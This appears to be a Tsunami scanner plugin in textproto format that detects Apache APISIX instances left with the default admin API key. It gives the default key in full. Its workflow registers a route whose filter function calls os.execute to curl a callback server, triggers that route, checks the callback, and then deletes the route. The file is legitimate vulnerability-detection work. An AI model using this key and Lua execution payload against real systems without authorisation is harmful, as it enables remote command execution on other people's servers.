# proto-file: proto/templated_plugin.proto
# proto-message: TemplatedPlugin

###############
# PLUGIN INFO #
###############

info: {
  type: VULN_DETECTION
  name: "ApacheAPISIX_DefaultAPIKey"
  author: 
    "Robert Dick (robert@doyensec.com) for the Templated version, "
    "hh-hunter for the original Java version"
  version: "2.0"
}

finding: {
  main_id: {
    publisher: "GOOGLE"
    value: "APISIX_DEFAULT_TOKEN"
  }
  title: "Apache APISIX with default Admin token Detector"
  description: 
    "APISIX provides REST management API functionality. Users can manage APISIX using the REST"
    " Admin API. If the REST Admin API is exposed externally and the default hard-coded"
    " admin_key is not modified, an attacker can use the admin_key to execute arbitrary Lua"
    " code, leading to remote command execution."
  recommendation:
    "Change the default admin API key and set appropriate IP access control lists."
  severity: CRITICAL
}

###########
# ACTIONS #
###########

# create the route. 
# Note: modified a little bit from the original plugin to better match
# what the CVE-2022-24112 plugin does, but without batch-requests.

actions: {
  name: "register_route"
  http_request: {
    method: PUT
    uri: "/apisix/admin/routes/tsunami_rce?ttl=30"
    headers: [
        { name: "X-API-KEY" value: "{{ DEFAULT_API_KEY }}" },
        { name: "Content-Type" value: "application/json" }
    ]
    data: 
      '{"uri":"/tsunami_rce/{{ T_UTL_CURRENT_TIMESTAMP_MS }}"'
      ',"upstream":{"type":"roundrobin","nodes":{}},'
      '"name":"{{ T_UTL_CURRENT_TIMESTAMP_MS }}","filter_func'
      '":"{{ PIPE_REQ_FILTER_FUNC }}"}'
    response: {
      http_status: 201
    }
  }
  cleanup_actions: "cleanup_route"
}

# execute route

actions: {
  name: "execute_route"
  http_request: {
    method: GET
    uri: "/tsunami_rce/{{ T_UTL_CURRENT_TIMESTAMP_MS }}"
  }
}


# delete the created route

actions: {
  name: "cleanup_route"
  http_request: {
    method: DELETE
    uri: "/apisix/admin/routes/tsunami_rce"
    headers: { name: "X-API-KEY" value: "{{ DEFAULT_API_KEY }}" }
  }
}

actions: {
  name: "sleep"
  utility: { sleep: { duration_ms: 1000 } }
}
actions: {
  name: "check_callback_server_logs"
  callback_server: { action_type: CHECK }
}

#############
# WORKFLOWS #
#############

workflows: {
  condition: REQUIRES_CALLBACK_SERVER
  variables: [
    { name: "DEFAULT_API_KEY" value: "edd1c9f034335f136f87ad84b625c8f1" },
    { name: "PAYLOAD" value: "curl {{ T_CBS_URI }}" },
    { name: "PIPE_REQ_FILTER_FUNC" value: "function(vars) os.execute('{{ PAYLOAD }}'); return true end" }
  ]
  actions: [
    "register_route",
    "sleep",
    "execute_route",
    "sleep",
    "check_callback_server_logs"
  ]
}